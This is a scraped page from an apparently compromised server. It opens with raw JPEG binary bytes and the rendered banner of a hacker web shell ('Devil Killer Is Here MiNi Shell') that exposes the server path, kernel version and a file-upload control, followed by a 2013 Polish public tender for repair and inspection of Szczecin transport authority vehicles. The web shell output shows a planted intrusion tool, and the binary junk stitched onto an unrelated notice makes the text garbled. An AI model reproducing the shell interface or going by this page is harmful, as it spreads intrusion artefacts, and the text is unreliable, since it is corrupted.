JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/464262-N-2013.html

<p class="kh_header"><b>Szczecin: Naprawy, konserwacje, przeglądy techniczne i okresowe pojazdów ZDiTM w Szczecinie</b><br>
<b>Numer ogłoszenia: 464262 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 91 4800444,4800434, faks 91 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawy, konserwacje, przeglądy techniczne i okresowe pojazdów ZDiTM w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa serwisowania i naprawa samochodów służbowych ZDiTM w Szczecinie w zakresie wykonywania czynności pogwarancyjnych, przeglądów technicznych okresowych oraz wymiany uszkodzonych części zamiennych oraz usuwania uszkodzeń pojazdów  wynikających z bieżącej eksploatacji pojazdu, zagrażających bezpieczeństwu użytkownika, których konieczność wykonania stwierdzono w trakcie przeglądu lub naprawy.
2. Warunki realizacji zamówienia. Dotyczy I i II części zamówienia :
1)	 Zakres naprawy pojazdów będzie obejmował min. następujące czynności - układy:
a)	diagnostyka komputerowa silnika i jego układów;
b)	diagnostyka poduszek i kurtyn powietrznych;
c)	naprawa instalacji elektrycznej pojazdu wraz z podzespołami, regulacje;
d)	naprawa układu kierowniczego;
e)	naprawa układu hamulcowego;
f)	naprawa silnika i jego osprzętu;
g)	naprawa układu zasilania paliwem i powietrzem;
h)	naprawa układu przeniesienia mocy;
i)	naprawa zawieszenia pojazdu (określenie stopnia zużycia amortyzatorów);
j)	naprawa klimatyzacji;
k)	wymiana klamek, zawiasów, szyb, rolek przesuwnych drzwi;
l)	diagnostyka pojazdu bez przeprowadzenia remontu;
m)	wykonywanie okresowych przeglądów technicznych.
2)	Naprawa pojazdów w zakresie określonym odpowiednio dla każdej części Zamówienia zostanie wykonana zgodnie z warunkami technicznymi przewidzianymi przez producenta dla danej marki pojazdu. Naprawy są naprawami awaryjnymi, nie planowanymi i wynikającymi z różnych aspektów użytkowania pojazdów, nie jest możliwe określenie ich częstotliwości i rodzaju - grupy uszkodzeń (awarii) i jako takie mają charakter szacunkowy, nie stanowią zobowiązania dla Zamawiającego do jego pełnej realizacji i jako takie nie mogą być podstawą do dochodzenia przez Wykonawcę jakichkolwiek roszczeń dotyczących niezrealizowania całości przedmiotu zamówienia.
3)	Usługi przeglądu technicznego okresowego i naprawy wykonywane będą na podstawie  każdorazowego zlecenia składanego przez upoważnionego pracownika Zamawiającego.
4)	Wykonawca zapewnia prawidłowość wykonania przedmiotu umowy zgodnie z dokumentacją techniczną sporządzoną przez producenta, a także zobowiązany będzie wykonać usługi będące przedmiotem umowy przy pomocy wykwalifikowanych pracowników oraz stosować fabrycznie nowe, oryginalne części lub zamienniki o parametrach nie gorszych niż producenta, posiadające  wymagane prawem europejskim świadectwa jakości i certyfikaty, w tym bezpieczeństwa. Za zgodą Zamawiającego dopuszcza się zastosowanie części i mechanizmów zregenerowanych, nie mogą to być części i zespoły wchodzące w skład układu kierowniczego i hamulcowego. Cena zregenerowanego podzespołu lub części nie może przekraczać 60% wartości nowego elementu.
5)	W przypadku, gdy Wykonawca powierzy wykonanie przedmiotu umowy bądź jego części podwykonawcom, odpowiadać będzie za działanie bądź zaniechanie działania tych osób jak za swoje własne, a wszelkie rozliczenia między Wykonawcą a Podwykonawcą będą odbywały się bez udziału Zamawiającego.
6)	Zamawiający może odmówić przyjęcia usługi, której zewnętrzne cechy wskazywać będą na jej nieodpowiednią jakość.
7)	W przypadku przeglądów okresowych zakres wykonanych prac musi być zgodny z wykazem czynności wyszczególnionych w książce pojazdu, stosownie do jego przebiegu.
8)	Wykonawca udziela gwarancji na części (z wyłączeniem przynależnych do grupy jednorazowego użytku) oraz na jakość dokonywanych czynności wchodzących w zakres  przeglądów technicznych i napraw, której bieg rozpoczyna się od dnia odbioru samochodu z naprawy lub przeglądu. Czynność ta będzie potwierdzona protokołem odbioru podpisanym przez obie strony.
9)	Wymagany przez Zamawiającego minimalny okres gwarancji :
a)	na robociznę - min. 3 miesiące od dnia odbioru pojazdu,
b)	na zainstalowane części - okres gwarancji dla nowych części odpowiada okresom gwarancji 
określonym przez producenta, jednak okres ten nie może być krótszy niż 6 miesięcy od daty ich  montażu,
10)	Wykonawca zobowiązany jest do prowadzenia książki przeglądów technicznych okresowych dla każdego pojazdu oddzielnie.
11)	Wykonawca zapewnia holowanie z miejsca awarii na terenie miasta Szczecina do warsztatu :
a)	w okresie gwarancyjnym na własny koszt i własne ryzyko,
b)	w okresie pogwarancyjnym - na koszt Zamawiającego.
12)	Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć podpisaną kserokopię  umowy na utylizację olejów i filtrów.
13)	Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć podpisaną kserokopię umowy na neutralizację akumulatorów oraz ogumienia lub oświadczenie że akumulatory i ogumienie odbierane są przez dostawcę, który przy dostawie nowych zabiera zużyte..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-0, 50.11.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie stawia wymogu wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spelniony, jeżeli wykonawca wykaże, ze dysponuje:
Dotyczy Części nr 1 zamówienia - samochody osobowe:
a)  stacją obsługi (warsztatem samochodowym) zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego wyposażoną w :
- stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
- oprzyrządowanie do wykonania diagnostyki komputerowej silnika oraz układu 
   lektronicznego,
- co najmniej 2 kanały obsługowe,
b) stacją kontroli pojazdów spełniająca wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym (t.j. Dz.U. z 2012r., poz. 1137 ze zm.). 
Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji kontroli pojazdów, winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.

Dotyczy Części nr 2 zamówienia - samochody ciężarowe:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje:
a)  stacją obsługi (warsztatem samochodowym) zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego wyposażoną w :
- stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
- stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego,
- co najmniej 1 kanał obsługowy,
b) stacją kontroli pojazdów spełniająca wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym (t.j. Dz.U. z 2012r., poz. 1137 ze zm.).
Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji kontroli pojazdów, winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zarówno I jak i  II części zamówienia:
Warunek zostanie znany za spełniony, jeśli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą uprawnienia diagnosty zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 4 listopada 2004 r. w sprawie szczegółowych wymagań w stosunku do diagnostów (Dz.U. z 2004r., Nr 246 poz. 2469 ze zm.).

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy:
1)	wystąpi konieczność zmiany siedziby, NIP, REGON,
2)	wystąpi okoliczność niezależna od Wykonawcy (np. sprowadzenie części), które nie pozwalają na dotrzymanie terminu o którym mowa w § 3 pkt 5 niniejszej umowy.
3)	wystąpi konieczność zmiany konta bankowego Wykonawcy,
4)	wystąpi ustawowa zmiana stawki podatku VAT,
5)	wystąpi urzędowa zmiana stawki za przeglądy rejestracyjne (okresowe badania techniczne).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, 71-241 Szczecin, pokój nr 318, III pietro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 08:30, miejsce: Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, 71-241 Szczecin, sekretariat Dyrektora, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia : sam. osobowe- 23 sztuki i 8 sztuk sam. dostawczych do 3,5 t..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.MARKA SAMOCHODÓW NR REJ. NR BOCZ. ROK PROD.POJ. SILNIKA PALIWO	UWAGI
1.DAEWOO LANOS	ZS 15334	D - 01	2000	1,5	PB	 
2.FIAT PANDA VAN	ZS 99602	D - 02	2004	1,1	PB	 
3.SKODA OCTAVIA	ZS 8430R	R - 03	2009	1,6	PB	 
4.SKODA OCTAVIA	ZS 2104UR - 04	2010	1,6	PB	 
5.SKODA OCTAVIA	ZS 3905UR - 05	2010	1,6	PB	 
6.SKODA OCTAVIA	ZS 8206R	R - 06	2009	1,6	PB	 
7.KIA VENGA	ZS 5707TR - 07	2010	1,4	PB	 
8.HYUNDAI GETZ 	ZS 7908M	D - 08	2008	1,1	PB	 
9.HYUNDAI GETZ 	ZS 9709L	D - 09	2008	1,1	PB	 
10.FIAT PANDA  	ZS 79210	D - 10	2003	1,1	PB	 
11.FIAT PANDA	ZS 79211	D - 11	2003	1,1	PB	 
12.FIAT PANDA	ZS 79212	D - 12	2003	1,1	PB	 
13.FIAT PANDA	ZS 79213	D - 13	2003	1,1	PB	 
14.FIAT PANDA	ZS 99614	D - 14	2004	1,1	PB	 
15.FIAT PANDA	ZS 99615	D - 15	2004	1,1	PB	 
16.FIAT PANDA	ZS 99616	D - 16	2004	1,1	PB	 
17.FIAT PANDA	ZS 99617	D - 17	2004	1,1	PB	 
18.FIAT PANDA	ZS 5318TD - 18	2010	1,1	PB	 
19.FIAT DOBLO	ZS 99619	D - 19	2004	1,2	PB	 
20.FIAT PANDA	ZS 9022ND - 22	2008	1,1	PB	 
21.KIA CEE D	ZS 6820MD - 20	2008	1,6	PB	 
22.FIAT ALBEA	ZS 99603	D - 31	2004	1,2	PB	 
23.FIAT ALBEA	ZS 79205	D - 35	2003	1,2	PB	 
24.FIAT DOBLO Cargo  ZS 7325N D - 25 2008	1,4	PB  do 3.5t
25.FIAT DOBLO Cargo Furgon max  ZS 9726N D - 26 2008	1,3 ON do 3.5t
26.CITROEN BERLINGO ZS 4234U D - 34  2010	1,6	ON  do 3.5t
27.RENAULT KANGOO ZS 9833T D - 33  2010	1,6	PB  do 3.5t
28.RENAULT KANGOO ZS 2736U D - 36 2010	1,5	ON do 3.5t
29.RENAULT KANGOO ZS 3032U D - 32 2010	1,5	ON do 3.5t
30.FORD Transit VAN ZS 2421M D - 21 2008	2,4	ON do 3,5t
31.FORD Transit ZS 0729T	 D - 29	2010	2,4	ON do 3,5t
1 Kod CPV : 50.11.20.00 - Usługi w zakresie napraw i konserwacji samochodów.
2 Wykonawca winien wykonywać usługi będące przedmiotem zamówienia w terminie nie  dłuższym niż 3 dni robocze od daty przekazania pojazdu.
3 Wykonawca winien dysponować lub będzie dysponował w celu realizacji zamówienia co najmniej jedną: 
a) stacją obsługi -warsztatem samochodowym- zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego,  wyposażoną w:
-stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
-stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego,
-co najmniej 2 kanały obsługowe.
Stacja obsługi (warsztat) winien być otwarty:
-od poniedziałku do piątku w godzinach od 07.00 - 21.00,
-w soboty w godzinach 08.00 - 14.00.
b)stacją kontroli pojazdów spełniająca wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.z 2004r., Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym (t.j. Dz.U. z 2012r., poz. 1137 ze zm.).
Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji kontroli pojazdów, winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.
4 Zamawiający wymaga aby pojazdy oczekujące na naprawę były przechowywane na terenie:
a)ogrodzonym, o utwardzonej nawierzchni (poprzez utwardzenie należy rozumieć: wyasfaltowanie, kostka brukowa wybetonowanie, wysypanie żwirem, tłuczniem, itp.),
b)strzeżonym całodobowo lub monitorowanym za pomocą kamer z możliwością rejestracji zapisu oraz oświetlonym, gwarantującym nienaruszalność pojazdów dla osób postronnych,
c)powierzchni umożliwiającej jednoczesne przechowanie min.2 pojazdów.
5 Wykonawca umożliwi Zamawiającemu wgląd do pomieszczeń w celu weryfikacji ww. wymagań w zakresie wymaganego wyposażenia jakie posiada Wykonawca w miejscu wykonywania usług będących przedmiotem zamówienia. Wykonawca, który uniemożliwi Zamawiającemu zweryfikowanie ww. wymagań naruszy SIWZ i na podstawie art. 89 ust.1 pkt 2) ustawy PZP jego oferta zostanie odrzucona..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia : samochody ciężarowe (wraz z ciągnikiem rolniczym) - 5 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.MARKA POJAZDU     NR REJESTR.  POJEMNOŚĆ	PALIWO	ROK PROD.
1STAR 1142	      ZS 18067	4580	             ON	1998
2DAF	                   ZS 7023T	6692,6	             ON	2010
3.Ciągnik rolniczy ZETOR ZS 9123	4156	             ON	2009
4RENAULT	        ZS 1927S	4764	             ON	2008
5.RENAULT - laweta       ZS 0537W	4764	             ON	2011
